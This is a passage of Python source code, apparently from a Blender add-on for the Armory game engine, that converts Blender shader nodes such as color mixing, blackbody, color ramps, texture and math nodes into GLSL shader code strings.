return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass throuh
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
